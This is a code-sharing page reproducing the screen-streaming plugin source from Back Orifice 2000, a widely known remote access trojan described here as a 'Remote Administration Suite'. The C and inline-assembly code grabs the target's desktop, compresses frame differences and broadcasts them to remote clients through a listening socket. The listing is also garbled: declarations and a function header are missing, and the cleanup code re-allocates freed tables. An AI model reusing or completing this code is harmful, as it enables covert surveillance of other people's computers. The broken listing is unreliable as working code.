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Package: [view]
Upload User: jinandeyu
Upload Date: 2007-01-05
Package Size: 620k
Code Size: 16k
Remote Control
Development Platform:
- /* Back Orifice 2000 - Remote Administration Suite
- Copyright (C) 1999, Cult Of The Dead Cow
- This program is free software; you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation; either version 2 of the License, or
- (at your option) any later version.
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- GNU General Public License for more details.
- You should have received a copy of the GNU General Public License
- along with this program; if not, write to the Free Software
- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
- The author of this program may be contacted at */
- #include<windows.h>
- #include<plugins.h>
- #include<auth.h>
- #include<bocomreg.h>
- #include<iohandler.h>
- #include<encryption.h>
- #include<config.h>
- #include<strhandle.h>
- #include"bo_peep.h"
- #include"vidstream.h"
- #include"client.h"
- #define MAX_STREAMS 16
- #define MTU_STREAM 1400
- typedef struct {
- int xdim;
- int ydim;
- int rate;
- CAuthSocket *pSock;
- // -------------------- Global Variables ------------------------
- // VidStream control
- static HANDLE g_hVThread=NULL;
- static BOOL g_bStrActive=FALSE;
- // Screen device
- static HDC g_hScrDC;
- // Full screen dibits
- static int g_xscdim;
- static int g_yscdim;
- static BYTE *g_pcFullGreyBits;
- // Viewport dibits
- static int g_xsize;
- static int g_ysize;
- static HDC g_hViewDC;
- static HBITMAP g_hbmView;
- static BITMAPINFOHEADER g_bmhView;
- static DWORD *g_pdwViewBits;
- static BYTE *g_pcViewGreyBits;
- // Cursor and view positions
- static WORD g_wViewPosX,g_wViewPosY;
- static WORD g_wCurPosX,g_wCurPosY;
- static WORD g_wLastCurPosX,g_wLastCurPosY;
- // Diff dibits
- static BYTE *g_pcDiffBits;
- // Greyscale conversion
- static DWORD *g_pGreyTable;
- // Rectangular compresion
- static WORD *g_pRectCmp;
- // ----------------------- Function Implementations ------------------------------
- // RLECompress: Run length encoder
- BYTE *RLECompress(BYTE *frame, int size, int *pnRLESize)
- {
- BYTE *rlebuf=(BYTE *)malloc(size*2);
- if(rlebuf==NULL) return NULL;
- int i,outpos,inpos,cnt,runcnt;
- cnt=0;
- inpos=0;
- outpos=0;
- i=0;
- while(i<size) {
- if(i<(size-2) && (frame[i+1]==frame[i] && frame[i+2]==frame[i])) {
- // Check for RLE run
- BYTE col=frame[i];
- i++;
- runcnt=1;
- while(i<size && runcnt<127) {
- if(frame[i]!=col) break;
- i++;
- runcnt++;
- }
- // Emit block of pixels
- if(cnt>0) {
- rlebuf[outpos]=cnt;
- memcpy(rlebuf+outpos+1,frame+inpos,cnt);
- outpos+=(1+cnt);
- cnt=0;
- }
- inpos=i;
- // Emit RLE run of pixels
- rlebuf[outpos]=0x80 | runcnt;
- rlebuf[outpos+1]=col;
- outpos+=2;
- } else {
- cnt++;
- if(cnt==127 || (i==(size-1) && cnt>0)) {
- // Emit block of pixels
- rlebuf[outpos]=cnt;
- memcpy(rlebuf+outpos+1,frame+inpos,cnt);
- outpos+=(1+cnt);
- cnt=0;
- inpos=i;
- }
- i++;
- }
- }
- *pnRLESize=outpos;
- return rlebuf;
- }
- // RLEFree: cleanup after RLECompress()
- void RLEFree(BYTE *buf)
- {
- free(buf);
- }
- /*
- // RectCompress: Rectangular compression engine
- BYTE *RectCompress(int size, BYTE *frame, int *pnRLESize)
- {
- BYTE *rectbuf=(BYTE *)malloc(size*2);
- if(rectbuf==NULL) return NULL;
- int outpos,inpos;
- int x,y,nrx,nry,a,b;
- nrx=g_xsize/16;
- nry=g_ysize/16;
- // Find blocks of solid colors
- for(y=0;y<nry;y++) {
- for(x=0;x<nrx;x++) {
- inpos=(x+y*g_ysize)*16;
- BYTE col=frame[inpos];
- // check for colors
- for(b=0;b<16;b++) {
- for(a=0;a<16;a++) {
- if(col!=frame[inpos+a+b*g_xsize]) break;
- }
- }
- if(b==16) g_pRectCmp[x+y*nry]=col;
- else g_pRectCmp[x+y*nry]=0x8000;
- }
- }
- // Expand solid color areas
- for(y=0;y<nry;y++) {
- for(x=0;x<nrx;x++) {
- }
- }
- // *pnRLESize=outpos;
- return rectbuf;
- }
- // RectFree: Cleanup after RectCompress()
- void RectFree(BYTE *buf)
- {
- free(buf);
- }
- */
- // ReduceFrame: Performs greyscale conversion of a series of 32 bit color pixels.
- int ReduceFrame(DWORD *pInFrame,BYTE *pOutFrame,int cnt)
- {
- __asm {
- mov ecx, dword ptr [cnt]
- mov edi, dword ptr [pOutFrame]
- mov esi, dword ptr [pInFrame]
- mov ebx, dword ptr [g_pGreyTable]
- xor edx,edx
- }
- greyloop: _asm {
- mov dl, byte ptr [esi]
- mov eax, dword ptr [ebx+0+edx*4]
- mov dl, byte ptr [esi+1]
- add eax, dword ptr [ebx+1024+edx*4]
- mov dl, byte ptr [esi+2]
- add eax, dword ptr [ebx+2048+edx*4]
- mov byte ptr [edi], ah
- add esi,4
- inc edi
- dec ecx
- jnz greyloop
- }
- return 0;
- }
- // GetDiffFrame: Find the XOR difference between a viewport and the 'full screen',
- // modifies the 'full screen' with the viewport image and returns the difference
- BOOL GetDiffFrame(BYTE *pView, int vsx, int vsy, BYTE *pFull, int fx, int fy, int fsx, int fsy, BYTE *pDiff)
- {
- BYTE *pFullFrame;
- int nPitchAdd;
- pFullFrame=pFull+fsx*fy+fx;
- nPitchAdd=fsx-vsx;
- DWORD total=0;
- _asm {
- mov esi,dword ptr [pFullFrame]
- mov ebx,dword ptr [pView]
- mov edi,dword ptr [pDiff]
- mov ecx,dword ptr [vsy]
- shl ecx,16
- }
- dfyloop: _asm {
- mov cx,word ptr [vsx]
- }
- dfxloop: _asm {
- mov eax,dword ptr [esi]
- mov edx,dword ptr [ebx]
- xor eax,edx
- mov dword ptr [edi],eax
- mov dword ptr [esi],edx
- add dword ptr [total],eax
- add ebx,4
- add edi,4
- add esi,4
- sub cx,4
- jnz dfxloop
- add esi,dword ptr [nPitchAdd]
- sub ecx,65536
- jnz dfyloop
- }
- if(total>0) return TRUE;
- return FALSE;
- }
- // FreeDiffFrame: Cleanup after GetDiffFrame()
- void FreeDiffFrame(BYTE *buf)
- {
- free(buf);
- }
- // IssueFullScreen: sends over a compressed image of the entire
- // screen, Used to synchronize a client at the start of the stream.
- int IssueFullScreen(CAuthSocket *pSock)
- {
- // RLECompress the screen image
- int nRLESize;
- BYTE *rlebuf;
- rlebuf=RLECompress(g_pcFullGreyBits, g_xscdim*g_yscdim, &nRLESize);
- if(rlebuf==NULL)
- return -1;
- // Tack on packet header
- hdr.wPosX=0;
- hdr.wPosY=0;
- hdr.wSizeX=g_xscdim;
- hdr.wSizeY=g_yscdim;
- hdr.wCurPosX=g_wCurPosX;
- hdr.wCurPosY=g_wCurPosY;
- hdr.wFlags=VHF_FULLFRAME;
- hdr.dwSize=(DWORD)nRLESize;
- // Send the packet header (not all the data's going to fit in one packet anyway)
- int nRet,i;
- while((nRet=pSock->Send((BYTE *)&hdr,sizeof(VIDSTREAM_HEADER)))==0)
- Sleep(20);
- if(nRet==-1) {
- RLEFree(rlebuf);
- return -1;
- }
- // Send packet body
- i=0;
- while(i<nRLESize) {
- int nXmit=((nRLESize-i)>MTU_STREAM)?MTU_STREAM:(nRLESize-i);
- while((nRet=pSock->Send(rlebuf+i,nXmit))==0) Sleep(20);
- if(nRet==-1) {
- RLEFree(rlebuf);
- return -1;
- }
- i+=nXmit;
- }
- return 0;
- }
- // CalcDiffScreen: takes two bitmaps and XORs them, storing the updated
- // image in the 'full screen bitmap' and stores the XOR diff, to be
- // compressed and sent to the client.
- BYTE *CalcDiffScreen(int *pnDiffSize)
- {
- // Get cursor position
- POINT pt;
- GetCursorPos(&pt);
- g_wLastCurPosX=g_wCurPosX;
- g_wLastCurPosY=g_wCurPosY;
- g_wCurPosX=(WORD)pt.x;
- g_wCurPosY=(WORD)pt.y;
- // Get viewport position
- int left=pt.x-(g_xsize/2);
- int top=pt.y-(g_ysize/2);
- if(left<0) left=0;
- if(top<0) top=0;
- if(left>(g_xscdim-g_xsize)) left=(g_xscdim-g_xsize);
- if(top>(g_yscdim-g_ysize)) top=(g_yscdim-g_ysize);
- g_wViewPosX=left;
- g_wViewPosY=top;
- // Get viewport bits
- BitBlt(g_hViewDC,0,0,g_xsize,g_ysize,g_hScrDC,left,top,SRCCOPY);
- GetDIBits(g_hViewDC,g_hbmView,0,g_ysize,g_pdwViewBits,(BITMAPINFO *)&g_bmhView,DIB_RGB_COLORS);
- // Reduce view dibits to grey frame
- ReduceFrame(g_pdwViewBits,g_pcViewGreyBits,g_xsize*g_ysize);
- // XOR the two frames and get the diff
- if(GetDiffFrame(g_pcViewGreyBits, g_xsize, g_ysize, g_pcFullGreyBits, left, top, g_xscdim, g_yscdim, g_pcDiffBits)) {
- // RLECompress the new frame
- int nRLESize;
- BYTE *rlebuf;
- rlebuf=RLECompress(g_pcDiffBits,g_xsize*g_ysize,&nRLESize);
- if(rlebuf==NULL)
- return NULL;
- *pnDiffSize=nRLESize;
- return rlebuf;
- } else {
- int i;
- i=0;
- }
- return NULL;
- }
- // FreeDiffScreen: memory cleanup for CalcDiffScreen
- void FreeDiffScreen(BYTE *ptr)
- {
- if(ptr!=NULL)
- RLEFree(ptr);
- }
- // IssueDiffScreen: Sends a XOR diff viewport image to the
- int IssueDiffScreen(CAuthSocket *pSock, BYTE *pDiff, int nDiffLen)
- {
- // Tack on packet header
- if(pDiff==NULL) {
- nDiffLen=0;
- if(g_wLastCurPosX==g_wCurPosX && g_wLastCurPosY==g_wCurPosY) return 0;
- }
- hdr.wFlags=VHF_FRAMEDIFF;
- hdr.wSizeX=g_xsize;
- hdr.wSizeY=g_ysize;
- hdr.wPosX=g_wViewPosX;
- hdr.wPosY=g_wViewPosY;
- hdr.wCurPosX=g_wCurPosX;
- hdr.wCurPosY=g_wCurPosY;
- hdr.dwSize=(DWORD)nDiffLen;
- // Send the packet header
- int nRet,i;
- while((nRet=pSock->Send((BYTE *)&hdr,sizeof(VIDSTREAM_HEADER)))==0)
- Sleep(0);
- if(nRet==-1)
- return -1;
- // Send packet body
- i=0;
- while(i<nDiffLen) {
- int nXmit=((nDiffLen-i)>MTU_STREAM)?MTU_STREAM:(nDiffLen-i);
- while((nRet=pSock->Send(pDiff+i,nXmit))==0)
- Sleep(0);
- if(nRet==-1)
- return -1;
- i+=nXmit;
- }
- return 0;
- }
- {
- int nRate;
- CAuthSocket *pSock,*pChild;
- CAuthSocket *pChildren[MAX_STREAMS];
- int nChildren,i,j;
- DWORD dwPeriod;
- // ---------- Get parameters --------------------
- g_xsize=pArgs->xdim;
- g_ysize=pArgs->ydim;
- nRate=pArgs->rate;
- dwPeriod=(1000/nRate);
- pSock=pArgs->pSock;
- free(pArgs);
- g_nNumThreads=1;
- // --------- Initialize screen capture ----------
- // Full screen
- g_hScrDC=GetDC(NULL);
- g_xscdim=GetSystemMetrics(SM_CXSCREEN);
- g_yscdim=GetSystemMetrics(SM_CYSCREEN);
- g_pcFullGreyBits=(BYTE *)malloc(g_xscdim*g_yscdim);
- // Viewport
- memset(&g_bmhView,0,sizeof(BITMAPINFOHEADER));
- g_bmhView.biSize=sizeof(BITMAPINFOHEADER);
- g_bmhView.biWidth=g_xsize;
- g_bmhView.biHeight=-g_ysize;
- g_bmhView.biPlanes=1;
- g_bmhView.biBitCount=32;
- g_bmhView.biCompression=BI_RGB;
- g_bmhView.biSizeImage=0;
- g_pdwViewBits=(DWORD *)malloc(g_xsize*g_ysize*sizeof(DWORD));
- g_pcViewGreyBits=(BYTE *)malloc(g_xsize*g_ysize);
- g_pcDiffBits=(BYTE *)malloc(g_xsize*g_ysize);
- g_hViewDC=CreateCompatibleDC(GetDC(NULL));
- g_hbmView=CreateCompatibleBitmap(GetDC(NULL),g_xsize,g_ysize);
- SelectObject(g_hViewDC,g_hbmView);
- // RGB->Grey
- g_pGreyTable=(DWORD *)malloc(sizeof(DWORD)*256*3);
- if(g_pGreyTable==NULL) return -1;
- for(i=0;i<256;i++) {
- g_pGreyTable[i]=i*29; // B
- g_pGreyTable[i+256]=i*150; // G
- g_pGreyTable[i+512]=i*77; // R
- }
- // Rectangular compression
- g_pRectCmp=(WORD *)malloc((g_xsize*g_ysize)/256);
- // --------- Do initial desktop capture ---------
- memset(&bmhFull,0,sizeof(BITMAPINFOHEADER));
- bmhFull.biSize=sizeof(BITMAPINFOHEADER);
- bmhFull.biWidth=g_xscdim;
- bmhFull.biHeight=-g_yscdim;
- bmhFull.biPlanes=1;
- bmhFull.biBitCount=32;
- bmhFull.biCompression=BI_RGB;
- bmhFull.biSizeImage=0;
- DWORD *pdwFullBits=(DWORD *)malloc(g_xscdim*g_yscdim*sizeof(DWORD));
- HDC hdccap=CreateCompatibleDC(g_hScrDC);
- HBITMAP hbmcap=CreateCompatibleBitmap(g_hScrDC,g_xscdim,g_yscdim);
- HGDIOBJ gdiold=SelectObject(hdccap,hbmcap);
- BitBlt(hdccap,0,0,g_xscdim,g_yscdim,g_hScrDC,0,0,SRCCOPY);
- GetDIBits(hdccap,hbmcap,0,g_yscdim,pdwFullBits,(BITMAPINFO *)&bmhFull,DIB_RGB_COLORS);
- ReduceFrame(pdwFullBits,g_pcFullGreyBits,g_xscdim*g_yscdim);
- SelectObject(hdccap,gdiold);
- DeleteObject(hbmcap);
- DeleteDC(hdccap);
- free(pdwFullBits);
- // --------------- Data socket loop ----------------------
- nChildren=0;
- DWORD dwThen,dwNow;
- g_bStrActive=TRUE;
- while(g_bStrActive) {
- dwThen=GetTickCount();
- // ------ Check for accepts --------
- if(nChildren<MAX_STREAMS) {
- pChild=pSock->Accept();
- if(pChild!=NULL) {
- // Send new child full screen
- if(IssueFullScreen(pChild)>=0) {
- pChildren[nChildren]=pChild;
- nChildren++;
- } else {
- pChild->Close();
- delete pChild;
- }
- }
- }
- // ------ Broadcast screen diff data ---------
- if(nChildren>0) {
- // Calculate screen diffs
- int nDiffLen;
- BYTE *pDiff=CalcDiffScreen(&nDiffLen);
- for(i=(nChildren-1);i>=0;i--) {
- if(IssueDiffScreen(pChildren[i],pDiff,nDiffLen)<0) {
- pChildren[i]->Close();
- delete pChildren[i];
- for(j=i+1;j<nChildren;j++) {
- pChildren[j-1]=pChildren[j];
- }
- pChildren[j-1]=NULL;
- nChildren--;
- }
- }
- FreeDiffScreen(pDiff);
- }
- // ------- Wait for next frame ---------
- dwNow=GetTickCount();
- if((dwNow-dwThen)<dwPeriod)
- Sleep((dwPeriod-(dwNow-dwThen)));
- if(g_bActive==FALSE) g_bStrActive=FALSE;
- }
- // Free rect comp table
- free(g_pRectCmp);
- // Free greyscale tables
- free(g_pGreyTable);
- // Close all connections
- for(i=(nChildren-1);i>=0;i--) {
- pChildren[i]->Close();
- delete pChildren[i];
- pChildren[i]=NULL;
- }
- nChildren=0;
- pSock->Close();
- delete pSock;
- // Clean up
- free(g_pcFullGreyBits);
- // Viewport
- free(g_pdwViewBits);
- free(g_pcViewGreyBits);
- free(g_pcDiffBits);
- DeleteDC(g_hViewDC);
- DeleteObject(g_hbmView);
- // RGB->Grey
- g_pGreyTable=(DWORD *)malloc(sizeof(DWORD)*256*3);
- if(g_pGreyTable==NULL) return -1;
- for(i=0;i<256;i++) {
- g_pGreyTable[i]=i*29; // B
- g_pGreyTable[i+256]=i*150; // G
- g_pGreyTable[i+512]=i*77; // R
- }
- // Rectangular compression
- g_pRectCmp=(WORD *)malloc((g_xsize*g_ysize)/256);
- g_nNumThreads=0;
- return 0;
- }
- int CmdProc_StartVidStream(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
- {
- char *svXDim=NULL,*svYDim=NULL;
- char *svEnc=NULL,*svAuth=NULL,*svNetMod=NULL,*svParam=NULL;
- int nXDim=0,nYDim=0,nRate=15;
- // Check if already started
- if(g_hVThread!=NULL) {
- IssueAuthCommandReply(cas_from,comid,0,"Vidstream socket already created.n");
- return -1;
- }
- // Get parameters
- svXDim=GetCfgStr(g_szAdvancedOptions,"VidStream X Res");
- svYDim=GetCfgStr(g_szAdvancedOptions,"VidStream Y Res");
- svNetMod=GetCfgStr(g_szAdvancedOptions,"VidStream Net Module");
- svEnc=GetCfgStr(g_szAdvancedOptions,"VidStream Encryption");
- svAuth=GetCfgStr(g_szAdvancedOptions,"VidStream Auth");
- if((svParam=svArg2)!=NULL) {
- if(svArg2[0]!='') svXDim=svParam;
- if((svParam=BreakString(svXDim,","))!=NULL) {
- if(svParam[0]!='') svYDim=svParam;
- if((svParam=BreakString(svYDim,","))!=NULL) {
- if(svParam[0]!='') svNetMod=svParam;
- if((svParam=BreakString(svNetMod,","))!=NULL) {
- if(svParam[0]!='') svEnc=svParam;
- if((svParam=BreakString(svEnc,","))!=NULL) {
- if(svParam[0]!='') svAuth=svParam;
- }
- }
- }
- }
- }
- nRate=nArg1;
- if(nRate<=0) nRate=15;
- // Create listener socket
- svParam=GetCfgStr(g_szAdvancedOptions,"VidStream Bind Str");
- if(svArg3!=NULL) {
- if(svArg3[0]!='') svParam=svArg3;
- }
- CAuthSocket *pSock=ListenAuthSocket(InteractiveListen,cas_from->GetUserID(),NULL, svParam,svNetMod,svEnc,svAuth);
- if(pSock==NULL || pSock==(CAuthSocket *)0xFFFFFFFF) {
- IssueAuthCommandReply(cas_from,comid,0,"Couldn't start listening socket.n");
- return -1;
- }
- // Spawn listener thread
- if(pArgs==NULL) {
- pSock->Close();
- IssueAuthCommandReply(cas_from,comid,0,"Memory allocation error.n");
- return -1;
- }
- pArgs->xdim=atoi(svXDim);
- pArgs->ydim=atoi(svYDim);
- pArgs->pSock=pSock;
- pArgs->rate=nRate;
- DWORD dwTid;
- g_hVThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)VidStreamThread,pArgs,0,&dwTid);
- if(g_hVThread==NULL) {
- free(pArgs);
- pSock->Close();
- IssueAuthCommandReply(cas_from,comid,0,"Could create thread.n");
- }
- char svResponse[512],svConAddr[256];
- pSock->GetConnectAddr(svConAddr,256);
- wsprintf(svResponse, "VidStream started on %.256sn",svConAddr);
- IssueAuthCommandReply(cas_from, comid, 0, svResponse);
- return 0;
- }
- int CmdProc_StopVidStream(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
- {
- g_bStrActive=FALSE;
- if(WaitForSingleObject(g_hVThread,5000)!=WAIT_OBJECT_0) {
- IssueAuthCommandReply(cas_from, comid, 0, "Couldn't stop vidstream in 5 sec. Aborting thread.n");
- TerminateThread(g_hVThread,0);
- }
- CloseHandle(g_hVThread);
- g_hVThread=NULL;
- IssueAuthCommandReply(cas_from, comid, 0, "VidStream stopped.n");
- return 0;
- }